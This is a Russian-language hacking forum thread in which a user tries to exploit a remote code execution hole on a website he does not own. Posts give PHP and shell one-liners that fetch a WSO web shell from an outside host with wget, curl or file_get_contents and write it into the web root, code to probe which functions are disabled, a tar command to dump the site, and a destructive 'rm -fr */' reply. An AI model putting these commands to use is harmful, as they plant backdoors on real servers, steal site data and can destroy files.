Загрузка Shell через RCE

Discussion in 'Уязвимости' started by Sensoft, 28 Jan 2018.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Через нетспаркер нашёл дыру RCE
    через команду
    Code:
    <?php shell_exec('wget http://txt.731my.com/wso.txt -O jeks.php');?>
    дыра в регистрации
    site.ru/register/jeks.php
    site.ru/jeks.php
    shell так и не залился искал по адресам которые выше
    в чём проблема ?
     
  2. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    curl -s -k http://txt.731my.com/wso.txt >> /var/www/название сайта/data/www/название сайта.com/wso.php & echo done
    тоже не катит
     
  3. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    PHP:
    <?php file_put_contents($_SERVER['DOCUMENT_ROOT'].'/папка_с_права_на_запись/wso.php',file_get_contents('http://txt.731my.com/wso.txt '));
    Пробовали? Есть вероятность, что системные команды выключены настройками безопасности? потому exec,passthru,shell_exec,system,proc_open,popen,curl_exec и тд работать не будут, проверьте phpinfo();
     
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    не прокатило
     
  5. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    584
    Likes Received:
    284
    Reputations:
    51
  6. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    428
    Likes Received:
    579
    Reputations:
    52
    ТС, ты хоть пхп для начала выучи, чтоли. Ты уже второй месяц чего-то там взламываешь. За это время можно-бы было выучить язык и больше никогда не создавать нубских топиков.

    По сабжу.
    Для начала надо убедиться что пхп-код вообще выполняется на сервере. Если это RCE то запусти такой код:
    PHP:
    $url 'http://site.ru/file.txt';
    $banned ini_get('disable_functions');
    if (
    function_exists('curl_init') && !is_int(strpos($banned'curl_'))) {
        
    $ch curl_init($url);
        
    curl_exec($ch);
    } else {
        
    file_get_contents($url);
    }
    Ну или то-же самое под eval+base64. Затем идёшь в админку хостинга site.ru и смотришь в логе веб-сервера заходил-ли кто на /file.txt. Если в логе есть запись с этим uri - значит код на сервере запускается. Ели нет - либо функции заблокированы в disable_functions, либо вообще RCE не работает, что скорее всего.
     
    #6 pas9x, 28 Jan 2018
    Last edited: 28 Jan 2018
    dmax0fw likes this.
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Вчера шуршал, папку с правами так и не увидел
    теперь понятно почему я не мог загрузить shell
     
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    Просматривать файлы я могу
    Есть команда для того чтобы сдампить весь сайт ?
     
  9. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    428
    Likes Received:
    579
    Reputations:
    52
    PHP:
    <?php system('tar cf dump.tar /путь/к/директории/сайта'); ?>
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    399
    Likes Received:
    38
    Reputations:
    1
    не катит
     
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    rm -fr */
     
    sysjuk, ms13 and pas9x like this.
Loading...